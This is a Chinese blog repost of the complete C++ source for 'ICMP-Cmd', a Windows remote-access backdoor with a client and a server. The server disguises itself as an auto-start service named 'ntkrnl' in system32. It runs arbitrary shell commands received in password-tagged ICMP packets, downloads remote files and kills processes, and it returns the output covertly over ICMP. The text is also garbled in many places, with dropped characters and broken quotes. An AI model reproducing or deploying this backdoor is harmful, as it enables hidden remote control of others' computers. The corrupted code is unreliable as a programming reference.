ICMP后门程序原码

最新推荐文章于 2022-02-19 11:17:11 发布
最新推荐文章于 2022-02-19 11:17:11 发布
阅读量1.5k 收藏
点赞数
文章标签: service null buffer socket access path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2195/article/details/90044
版权
 
//*********client.cpp***********/// 
  
  
  
#include  
#include  
#include  
  
pragma comment(lib,"ws2_32.lib) 
  
char SendMsg[256]; 
  
/* The IP header */ 
typedef struct iphdr { 
unsigned int h_len:4; //4位首部长度 
unsigned int version:4; //IP版本号,4表示IPV4 
unsigned char tos; //8位服务类型TOS 
unsigned short total_len; //16位总长度(字节) 
unsigned short ident; //16位标识 
unsigned short frag_and_flags; //3位标志位 
unsigned char ttl; //8位生存时间 TTL 
unsigned char proto; //8位协议 (TCP, UDP 或其他) 
unsigned short checksum; //16位IP首部校验和 
unsigned int sourceIP; //32位源IP地址 
unsigned int destIP; //32位目的IP地址 
}IpHeader; 
  
  
  
  
typedef struct _ihdr 

BYTE i_type;//8位类型 
BYTE i_code; //8位代码 
USHORT i_cksum;//16位校验和 
USHORT i_id;//识别号(一般用进程号作为识别号) 
USHORT i_seq;//报文序列号 
ULONG timestamp;//时间截 
} IcmpHeader; 
  
#define STATUS_FAILED 0xFFFF 
 
#define MAX_PACKET 2000 
char arg[1450]; 
  
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s)) 
  
  
void fill_icmp_data(char *, int); 
USHORT checksum(USHORT *, int); 
  
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数 
void help(void); 
void usage(char * prog); 
  
int main(int argc, char *argv[]) 

char *ICMP_DEST_IP; //目标主机的IP 
char *recvbuf; 
  
if(argc!=2) 

usage(argv[0]); 
return 0; 

  
ICMP_DEST_IP=argv[1];//取得目标主机IP 
WSADATA wsaData; 
SOCKET sockRaw; 
struct sockaddr_in dest,from; 
int datasize; 
int fromlen=sizeof(from); 
  
char *icmp_data; 
  
  
  
  
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) 

printf(stderr, "WSAStartup failed: %d/n, GetLastError()); 
ExitProcess(STATUS_FAILED); 

sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); 
int timeout=1000; 
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout)); 
timeout=4000; 
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout)); 
memset(&dest,0,sizeof(dest)); 
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP); 
dest.sin_family=AF_INET; 
  
usage(argv[0]); 
__try{ 
for(;;){ 
  
rintf("ICMP-CMD>); 
fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中 
  
||!strcmp(SendMsg,"q/n))ExitProcess(0); 
f(!strcmp(SendMsg,"/n))continue; 
||!strcmp(SendMsg,"h/n)){help();continue;} 
f(!memcmp(SendMsg,"http://,7)) 
FileName/"/n);continue;} 
  
datasize=strlen(SendMsg); 
datasize+=sizeof(IcmpHeader); 
rintf("ICMP packet size is %d,datasize); 
icmp_data= (char*)xmalloc(MAX_PACKET); 
recvbuf= (char *)xmalloc(MAX_PACKET); 
memset(icmp_data,0, MAX_PACKET); 
fill_icmp_data(icmp_data, datasize); 
((IcmpHeader *)icmp_data)->i_cksum=0; 
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize); 
  
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest)); 
  
if (bwrote == SOCKET_ERROR) 

f (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out/n); 
printf(stderr,"sendto failed: %d/n,WSAGetLastError()); 
  

  
if (bwrote 
  
return 0; 
  

  
rintf("/nSend Packet to %s Success!/n,argv[1]); 
  
DWORD start = GetTickCount(); 
for(;;){ 
  
if((GetTickCount() - start) >= 1000) break; 
memset(recvbuf,0,MAX_PACKET); 
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen); 
if(bread == SOCKET_ERROR) 

if(WSAGetLastError() == WSAETIMEDOUT) 

rintf("timed out/n); 
break; 

  
printf(stderr, "recvfrom failed: %d/n, WSAGetLastError()); 
break; 

  
decode_resp(recvbuf, bread, &from); 

}//end for 
  
}//end try 
  
  
  
  
__finally 

if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); 
WSACleanup(); 

  
return 0; 

  
  
USHORT checksum(USHORT *buffer, int size) 

unsigned long cksum=0; 
  
while(size > 1) 

cksum+=*buffer++; 
size-=sizeof(USHORT); 

  
if(size) 

cksum+=*(UCHAR *)buffer; 

  
cksum=(cksum >> 16) + (cksum & 0xffff); 
cksum+=(cksum >> 16); 
return(USHORT) (~cksum); 

void fill_icmp_data(char *icmp_data, int datasize) 

IcmpHeader *icmp_hdr; 
char *datapart; 
icmp_hdr= (IcmpHeader *)icmp_data; 
icmp_hdr->i_type=0; 
icmp_hdr->i_code=0; 
icmp_hdr->i_id=(USHORT)GetCurrentProcessId(); 
icmp_hdr->timestamp =GetTickCount(); 
icmp_hdr->i_seq=1234; 
datapart=icmp_data + sizeof(IcmpHeader); 
memcpy(datapart,SendMsg,sizeof(SendMsg)); 
  
}  
  
void usage(char * prog) 

printf("/t/t=====Welcome to www.hackerxfiles.net======/n); 
printf("/n); 
printf("/t/t---[ ICMP-Cmd v1.0 beta, by gxisone ]---/n); 
printf("/t/t---[ E-mail: gxisone@hotmail.com ]---/n); 
printf("/t/t---[ 2003/8/15 ]---/n); 
printf("/t/tusage: %s RemoteIP/n,prog); 
printf("/t/tCtrl+C or Q/q to Quite H/h for help/n); 

  
  
  
  
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)  

memset(arg,0,sizeof(arg)); 
IpHeader *iphdr; 
IcmpHeader *icmphdr; 
unsigned short iphdrlen; 
iphdr = (IpHeader *)buf; 
iphdrlen = iphdr->h_len * 4   
icmphdr = (IcmpHeader*)(buf + iphdrlen); 
if(icmphdr->i_seq==4321)//密码正确则输出数据段 

rintf("%d bytes from %s:,bytes, inet_ntoa(from->sin_addr)); 
rintf(" IcmpType %d,icmphdr->i_type); 
rintf(" IcmpCode %d,icmphdr->i_code); 
rintf("/n); 
memcpy(arg,buf+iphdrlen+12,1450); 
rintf("%s,arg); 

  
lse printf("Other ICMP Packets!/n); 
  

  
void help(void) 

printf("/n); 
printf("[ http://127.0.0.1/hack.exe -admin.exe ] (Download Files. Parth is system32)/n); 
printf("[pslist] (List the Process)/n); 
printf("[pskill ID] (Kill the Process)/n); 
printf("Command (run the command)/n);  
printf("/n); 
  
  

  
/*******************server.cpp***************/ 
  
#include  
#include  
#include  
#include  
include "stdafx.h 
pragma comment(lib, "Urlmon.lib) 
pragma comment(lib, "ws2_32.lib) 
 
#define ICMP_PASSWORD 1234  
#define STATUS_FAILED 0xFFFF 
#define MAX_PACKET 6500 
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) 
  
  
/* The IP header */ 
typedef struct iphdr { 
unsigned int h_len:4; //4位首部长度 
unsigned int version:4; //IP版本号,4表示IPV4 
unsigned char tos; //8位服务类型TOS 
unsigned short total_len; //16位总长度(字节) 
unsigned short ident; //16位标识 
unsigned short frag_and_flags; //3位标志位 
unsigned char ttl; //8位生存时间 TTL 
unsigned char proto; //8位协议 (TCP, UDP 或其他) 
unsigned short checksum; //16位IP首部校验和 
unsigned int sourceIP; //32位源IP地址 
unsigned int destIP; //32位目的IP地址 
}IpHeader; 
  
  
//定义ICMP首部 
typedef struct _ihdr  

BYTE i_type; //8位类型 
BYTE i_code; //8位代码 
USHORT i_cksum; //16位校验和  
USHORT i_id; //识别号(一般用进程号作为识别号) 
USHORT i_seq; //报文序列号  
ULONG timestamp; //时间戳 
}IcmpHeader; 
  
char arg[256]; 
char buffer[2048] = {0};//管道输出的数据 
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数 
void fill_icmp_data(char * icmp_data); 
void pslist(void); 
BOOL killps(DWORD id);//杀进程函数 
void send(void); 
char *ICMP_DEST_IP; 
USHORT checksum(USHORT *buffer, int size); 
  
  
  
HANDLE hMutex; 
SERVICE_STATUS ServiceStatus; 
SERVICE_STATUS_HANDLE ServiceStatusHandle; 
  
void WINAPI ICMP_CmdStart(DWORD,LPTSTR *); 
void WINAPI CmdControl(DWORD); 
DWORD WINAPI CmdService(LPVOID); 
void InstallCmdService(void); 
void RemoveCmdService(void); 
void usage(char *par); 
  
int main(int argc,char *argv[]) 

ERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl,ICMP_CmdStart},{NULL,NULL}}; 
  
if(argc==2) 

if(!stricmp(argv[1],"-install)) 

usage(argv[0]); 
InstallCmdService(); 

else if(!stricmp(argv[1],"-remove)) 

usage(argv[0]); 
RemoveCmdService(); 

else usage(argv[0]); 
return 0; 

else usage(argv[0]); 
 
  
  
  
StartServiceCtrlDispatcher(DispatchTable); 
  
return 0; 

  
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv) 

HANDLE hThread; 
  
ServiceStatus.dwServiceType = SERVICE_WIN32; 
ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE; 
ServiceStatus.dwServiceSpecificExitCode = 0; 
ServiceStatus.dwWin32ExitCode = 0; 
ServiceStatus.dwCheckPoint = 0; 
ServiceStatus.dwWaitHint = 0; 
  
ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl,CmdControl); 
if(ServiceStatusHandle==0) 

OutputDebugString("RegisterServiceCtrlHandler Error !/n); 
return  

  
ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
ServiceStatus.dwCheckPoint = 0; 
ServiceStatus.dwWaitHint = 0; 
 
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) 

OutputDebugString("SetServiceStatus in CmdStart Error !/n); 
return  

  
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL); 
if(hThread==NULL) 

OutputDebugString("CreateThread in CmdStart Error !/n); 

  
return  

  
void WINAPI CmdControl(DWORD dwCode) 

switch(dwCode) 

case SERVICE_CONTROL_PAUSE: 
ServiceStatus.dwCurrentState = SERVICE_PAUSED; 
break; 
  
case SERVICE_CONTROL_CONTINUE: 
ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
break; 
  
case SERVICE_CONTROL_STOP:  
WaitForSingleObject(hMutex,INFINITE); 
  
ServiceStatus.dwCurrentState = SERVICE_STOPPED; 
ServiceStatus.dwWin32ExitCode = 0; 
ServiceStatus.dwCheckPoint = 0; 
ServiceStatus.dwWaitHint = 0; 
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) 

OutputDebugString("SetServiceStatus in CmdControl in Switch Error !/n); 

  
ReleaseMutex(hMutex); 
CloseHandle(hMutex); 
return  
  
case SERVICE_CONTROL_INTERROGATE: 
break; 
  
default: 
break; 

  
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) 

OutputDebugString("SetServiceStatus in CmdControl out Switch Error !/n); 

  
return  

  
DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务 
{  
char *icmp_data; 
int bread,datasize,retval; 
SOCKET sockRaw = (SOCKET)NULL; 
WSADATA wsaData; 
struct sockaddr_in dest,from; 
int fromlen = sizeof(from); 
int timeout = 2000; 
char *recvbuf; 
  
  
  
if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) 

printf("WSAStartup failed: %s/n,retval); 
ExitProcess(STATUS_FAILED); 

  
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED); 
if (sockRaw == INVALID_SOCKET) 

printf("WSASocket() failed: %s/n,WSAGetLastError()); 
ExitProcess(STATUS_FAILED); 

__try{ 
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout)); 
  
if(bread == SOCKET_ERROR) __leave; 
  
  
memset(&dest,0,sizeof(dest)); 
dest.sin_family = AF_INET; 
datasize=0; 
datasize += sizeof(IcmpHeader);  
icmp_data =(char*)xmalloc(MAX_PACKET); 
recvbuf = (char*)xmalloc(MAX_PACKET); 
if (!icmp_data) { 
/fprintf(stderr,"HeapAlloc failed %d/n,GetLastError()); 
__leave; 

memset(icmp_data,0,MAX_PACKET); 
for(;;) { 
  
int bwrote; 
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); 
  
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen); 
if (bread == SOCKET_ERROR) 

if (WSAGetLastError() == WSAETIMEDOUT)continue; 
  
__leave; 
  

decode_resp(recvbuf,bread,&from); 
Sleep(200); 
memset(recvbuf,0,sizeof(recvbuf)); 


__finally { 
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); 
WSACleanup(); 

return 0; 

  
  
  
  
void InstallCmdService(void) 

SC_HANDLE schSCManager; 
SC_HANDLE schService; 
char lpCurrentPath[MAX_PATH]; 
char lpImagePath[MAX_PATH]; 
char *lpHostName; 
WIN32_FIND_DATA FileData; 
HANDLE hSearch; 
DWORD dwErrorCode; 
SERVICE_STATUS InstallServiceStatus; 
  
 
GetSystemDirectory(lpImagePath,MAX_PATH); 
strcat(lpImagePath,"//ntkrnl.exe); 
lpHostName=NULL; 
 
printf("Transmitting File ... ); 
hSearch=FindFirstFile(lpImagePath,&FileData); 
if(hSearch==INVALID_HANDLE_value

GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); 
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)  

dwErrorCode=GetLastError(); 
if(dwErrorCode==5) 

printf("Failure ... Access is Denied !/n);  

else 

printf("Failure !/n); 

return  

else 

printf("Success !/n); 


else 

printf("already Exists !/n); 
FindClose(hSearch); 

  
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); 
if(schSCManager==NULL) 

printf("Open Service Control Manager Database Failure !/n); 
return  

  
printf("Creating Service .... ); 
"ntkrnl,SERVICE_ALL_ACCESS, 
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, 
SERVICE_ERROR_IGNORE,"ntkrnl.exe,NULL,NULL,NULL,NULL,NULL);  
if(schService==NULL) 

dwErrorCode=GetLastError(); 
if(dwErrorCode!=ERROR_SERVICE_EXISTS) 

printf("Failure !/n); 
CloseServiceHandle(schSCManager); 
return  

else 

printf("already Exists !/n); 
schService=OpenService(schSCManager,"ntkrnl,SERVICE_START); 
if(schService==NULL) 

printf("Opening Service .... Failure !/n); 
CloseServiceHandle(schSCManager); 
return  



else 

printf("Success !/n); 

  
printf("Starting Service .... ); 
if(StartService(schService,0,NULL)==0)  

dwErrorCode=GetLastError(); 
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING) 

printf("already Running !/n); 
CloseServiceHandle(schSCManager);  
CloseServiceHandle(schService); 
return  


else 

printf("Pending ... ); 

  
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)  

if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING) 

Sleep(100); 

else 

break; 


if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING) 

printf("Failure !/n);  

else 

printf("Success !/n); 

  
CloseServiceHandle(schSCManager); 
CloseServiceHandle(schService); 
return  

  
void RemoveCmdService(void)  

SC_HANDLE schSCManager; 
SC_HANDLE schService; 
char lpImagePath[MAX_PATH]; 
char *lpHostName; 
WIN32_FIND_DATA FileData; 
SERVICE_STATUS RemoveServiceStatus; 
HANDLE hSearch; 
DWORD dwErrorCode; 
  
  
GetSystemDirectory(lpImagePath,MAX_PATH); 
strcat(lpImagePath,"//ntkrnl.exe); 
lpHostName=NULL; 
 
  
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); 
if(schSCManager==NULL) 

printf("Opening SCM ......... ); 
dwErrorCode=GetLastError(); 
if(dwErrorCode!=5) 

printf("Failure !/n);  

else 

printf("Failuer ... Access is Denied !/n); 

return  

  
schService=OpenService(schSCManager,"ntkrnl,SERVICE_ALL_ACCESS); 
if(schService==NULL)  

printf("Opening Service ..... ); 
dwErrorCode=GetLastError(); 
if(dwErrorCode==1060) 

printf("no Exists !/n); 

else 

printf("Failure !/n); 

CloseServiceHandle(schSCManager); 

else 

printf("Stopping Service .... ); 
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0) 

if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) 

printf("already Stopped !/n);  

else 

printf("Pending ... ); 
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0) 

while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)  

Sleep(10); 
QueryServiceStatus(schService,&RemoveServiceStatus); 

if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) 

printf("Success !/n); 

else 

printf("Failure !/n); 


else 

printf("Failure !/n);  



else 

printf("Query Failure !/n); 

  
printf("Removing Service .... );  
if(DeleteService(schService)==0) 

printf("Failure !/n);  

else 

printf("Success !/n); 


  
CloseServiceHandle(schSCManager);  
CloseServiceHandle(schService); 
  
printf("Removing File ....... ); 
Sleep(1500); 
hSearch=FindFirstFile(lpImagePath,&FileData); 
if(hSearch==INVALID_HANDLE_value

printf("no Exists !/n); 

else 

if(DeleteFile(lpImagePath)==0) 

printf("Failure !/n);  

else 

printf("Success !/n); 

FindClose(hSearch); 

  
return  

  
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)  

  
  
IpHeader *iphdr; 
IcmpHeader *icmphdr; 
unsigned short iphdrlen; 
iphdr = (IpHeader *)buf; 
iphdrlen = iphdr->h_len * 4   
icmphdr = (IcmpHeader*)(buf + iphdrlen); 
if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段 

  
ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址 
  
memcpy(arg,buf+iphdrlen+12,256); 
f (!memcmp(arg,"pskill,6)) 

killps(atoi(strstr(arg," ))); 
sizeof("Process is Killed!)); 
send(); 

  
  
  
lse if (!memcmp(arg,"pslist,6)){pslist();send();} 
lse if (!strcmp(arg,"remove/n)) 

RemoveCmdService(); 
sizeof("Service Removed!)); 
send(); 
return; 

************ http下载 ************* 
lse if (!memcmp(arg,"http://,7))  

if(char *FileName=strstr(arg,"-)) 

 
char url[200];//保存网址的数组 
memset(url,0,200); 
memcpy(url,arg,int(FileName-arg-1)); 
char fname[MAX_PATH]; 
GetSystemDirectory(fname,MAX_PATH); 
FileName++; 
strcat(fname,"//); 
strcat(fname,FileName); 
*strstr(fname,"/n)=NULL; 
HRESULT hRet=URLDownloadToFile(0,url,fname,0,0); 
memset(buffer,0,sizeof(buffer)); 
sizeof("Download OK/n)); 
else  
sizeof("Download Failure!/n)); 
send(); 
return; 


//******************************************* 
else{ 
  
SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出 
HANDLE hRead,hWrite; 
sa.nLength = sizeof(SECURITY_ATTRIBUTES); 
sa.lpSecurityDescriptor = NULL; 
sa.bInheritHandle = TRUE; 
if (!CreatePipe(&hRead,&hWrite,&sa,0))  

printf("Error On CreatePipe()); 
return; 
}  
  
  
STARTUPINFO si; 
PROCESS_INFORMATION pi;  
si.cb = sizeof(STARTUPINFO); 
GetStartupInfo(&si);  
si.hStdError = hWrite; 
si.hStdOutput = hWrite; 
si.wShowWindow = SW_HIDE; 
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 
  
char cmdline[270]; 
GetSystemDirectory(cmdline,MAX_PATH+1); 
  
trcat(cmdline,"//cmd.exe /c); 
  
strcat(cmdline,arg); 
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))  

printf("Error on CreateProcess()); 
return; 

CloseHandle(hWrite); 
 
 
DWORD bytesRead;  
  
for(;;){ 
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break; 
Sleep(200); 

/printf("%s,buffer); 

//发送输出数据 
  
send(); 
  

 
  
  

/else printf("Other ICMP Packets!/n); 
//printf(endl;  

  
  
  
  
USHORT checksum(USHORT *buffer, int size)  

unsigned long cksum=0; 
while(size >1)  

cksum+=*buffer++; 
size -=sizeof(USHORT); 

if(size ) { 
cksum += *(UCHAR*)buffer; 

cksum = (cksum >> 16) + (cksum & 0xffff); 
cksum += (cksum >>16); 
return (USHORT)(~cksum); 

void fill_icmp_data(char * icmp_data) 

  
IcmpHeader *icmp_hdr; 
char *datapart; 
icmp_hdr = (IcmpHeader*)icmp_data; 
icmp_hdr->i_type = 0; 
icmp_hdr->i_code = 0; 
icmp_hdr->i_id = (USHORT) GetCurrentProcessId(); 
icmp_hdr->i_cksum = 0; 
icmp_hdr->i_seq =4321; 
icmp_hdr->timestamp = GetTickCount(); //设置时间戳 
datapart = icmp_data + sizeof(IcmpHeader); 
memcpy(datapart,buffer,strlen(buffer)); 
//for(int i=0;i  

  
void usage(char *par) 

  
printf("/t/t=====Welcome to www.hackerxfiles.net======/n); 
printf("/n); 
printf("/t/t---[ ICMP-Cmd v1.0 beta, by gxisone ]---/n); 
printf("/t/t---[ E-mail: gxisone@hotmail.com ]---/n); 
printf("/t/t---[ 2003/8/15 ]---/n); 
printf("/n); 
printf("/t/tUsage: %s -install (to install service)/n,par); 
printf("/t/t %s -remove (to remove service)/n,par); 
printf("/n); 
  
return  
  
  

  
void send(void) 

  
WSADATA wsaData; 
SOCKET sockRaw = (SOCKET)NULL; 
struct sockaddr_in dest; 
int bread,datasize,retval,bwrote; 
int timeout = 1000; 
char *icmp_data; 
  
if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED); 
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED)) 
==INVALID_SOCKET) ExitProcess(STATUS_FAILED); 
__try 

if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave; 
//设置发送超时 
memset(&dest,0,sizeof(dest)); 
dest.sin_family = AF_INET; 
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP); 
datasize=strlen(buffer); 
datasize+=sizeof(IcmpHeader);  
icmp_data=(char*)xmalloc(MAX_PACKET); 
  
if(!icmp_data) __leave; 
memset(icmp_data,0,MAX_PACKET); 
  
fill_icmp_data(icmp_data); //填充ICMP报文 
((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和 
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文 
  
if (bwrote == SOCKET_ERROR) 

/if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out/n); 
/printf("sendto failed:<  
__leave; 

  
/printf("Send Packet to %s Success!/n<<  

  
  
__finally  

if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); 
WSACleanup(); 

memset(buffer,0,sizeof(buffer)); 
Sleep(200); 
  

  
void pslist(void) 

HANDLE hProcessSnap = NULL; 
PROCESSENTRY32 pe32= {0}; 
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
if (hProcessSnap == (HANDLE)-1) 

rintf("/nCreateToolhelp32Snapshot() failed:%d,GetLastError()); 
return  

pe32.dwSize = sizeof(PROCESSENTRY32); 
rintf("/nProcessName     ProcessID); 
if (Process32First(hProcessSnap, &pe32)) 

char a[5]; 
  
do 

strcat(buffer,pe32.szExeFile); 
trcat(buffer,"/t/t); 
itoa(pe32.th32ProcessID,a,10); 
strcat(buffer,a); 
trcat(buffer,"/n); 
/printf("/n%-20s%d,pe32.szExeFile,pe32.th32ProcessID); 

while (Process32Next(hProcessSnap, &pe32)); 
  

else 

rintf("/nProcess32Firstt() failed:%d,GetLastError()); 

CloseHandle (hProcessSnap); 
return; 

  
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限 

TOKEN_PRIVILEGES tp; 
LUID luid; 
  
if(!LookupPrivilegevalue(NULL,lpszPrivilege,&luid)) 

rintf("/nLookupPrivilegevalue error:%d, GetLastError() );  
return FALSE;  

tp.PrivilegeCount = 1; 
tp.Privileges[0].Luid = luid; 
if (bEnablePrivilege) 
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
else 
tp.Privileges[0].Attributes = 0; 
// Enable the privilege or disable all privileges. 
AdjustTokenPrivileges( 
hToken,  
FALSE,  
&tp,  
sizeof(TOKEN_PRIVILEGES),  
(PTOKEN_PRIVILEGES) NULL,  
(PDWORD) NULL);  
// Call GetLastError to determine whether the function succeeded. 
if (GetLastError() != ERROR_SUCCESS)  
{  
rintf("AdjustTokenPrivileges failed: %u/n, GetLastError() );  
return FALSE;  
}  
return TRUE; 

 
BOOL killps(DWORD id)//杀进程函数 

HANDLE hProcess=NULL,hProcessToken=NULL; 
BOOL IsKilled=FALSE,bRet=FALSE; 
__try 

  
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken)) 

rintf("/nOpen Current Process Token failed:%d,GetLastError()); 
__leave; 

/printf("/nOpen Current Process Token ok!); 
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE)) 

__leave; 

rintf("/nSetPrivilege ok!); 
  
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL) 

rintf("/nOpen Process %d failed:%d,id,GetLastError()); 
__leave; 

/printf("/nOpen Process %d ok!,id); 
if(!TerminateProcess(hProcess,1)) 

rintf("/nTerminateProcess failed:%d,GetLastError()); 
__leave; 

IsKilled=TRUE; 

__finally 

if(hProcessToken!=NULL) CloseHandle(hProcessToken); 
if(hProcess!=NULL) CloseHandle(hProcess); 

return(IsKilled); 
}
2195
关注
vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序
尹成的技术博客
03-29 9719
客户端 #include #include #include #pragma comment(lib,"ws2_32.lib")char SendMsg[256];/* The IP header */typedef struct iphdr {unsigned int h_len:4; //4位首部长度unsigned int version:4; //IP版本号,4表示I
icmp后门的编写
liujiayu2的专栏
03-15 1876
1 关于icmp的介绍      ICMP 的全称为(Internet Control Message Protocal)。它是一种差错报告机制,可以被用来向目的主机报告或者请求各种网络信息。这些信息包括回送应答(ping),目的地不可达,源站抑制,回送请求,掩码请求和掩码应答,还有是路由跟踪等。这些信息是用ICMP数据报报头中一个字节长度的类型码来区别的。     ICMP协议有一个
Python3实现ICMP远控后门(下)之“Boss”出场
七夜的博客
05-17 841
ICMP后门   前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之“嗅探”黑科技   熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示。     在前几篇的基础上,本...
Python3实现ICMP远控后门(中)之“嗅探”黑科技
七夜的博客
05-13 1350
ICMP后门 前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇   在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中。本次讲的是嗅探,为什么要讲...
开源工具:ICMP后门项目地址
mingyqf的博客
02-19 882
Prism backdoor 棱镜后门 PRISM 是一个用户空间隐身反向 shell 后门。 代码可在 GitHub 。 它已经过全面测试: Linux 索拉里斯 艾克斯 BSD/Mac 安卓 PRISM 可以以两种不同的方式工作: ICMP 和 STATIC 模式。 ICMP 模式 使用此操作模式后门会在后台静默等待特定的 ICMP 数据包 包含要连接回来的主机/端口和防止第三方访问的私钥。 首先,在攻击者机器上运行 netcat 以等待来自后门的传入连接: $ nc -l -p 6666 使用 s
使用Pyhton 编写的一个PDF操作程序原码
最新发布
02-21
程序原码
一个布局程序原码.rar_布局
09-23
"一个布局程序原码.rar_布局"的标题暗示了我们有一个关于布局管理的程序源代码,这可能是用于Android、Web或者桌面应用的。源码是开发者理解和学习软件工作原理的关键,它能帮助我们深入理解布局算法和实现细节。 ...
程序原码vf
08-20
【VF程序原码详解】 VF,全称Visual FoxPro,是由Microsoft公司开发的一款数据库管理系统,它基于FoxBase,是一款强大的关系型数据库管理软件。在编程领域,VF原码指的是使用Visual FoxPro语言编写的源代码,这些源...
原码、反码、补码小程序的设计与实现.pdf
07-01
文章还提到了两种实现负数原码、反码、补码之间程序设计的方法,并对机器数(即二进制数)之间的加减运算方法进行了介绍。具体运算过程通过实例进行了说明,同时为了验证程序设计的正确性,使用了人工算法进行验证。...
五子棋课程设计C++(附带原码、完整课程设计报告、应用程序
12-24
C++实现的完整的五子棋游戏程序设计,MFC图形界面,功能:用户登录、悔棋功能、游戏设置(可选择使用棋子颜色,人机对弈等游戏模式)、显示玩家信息、对话框提示出错信息(例如:落子位置错误)、对话框提示输赢、...
穿透Windows防火墙唤醒后门
weixin_40418457的博客
06-02 511
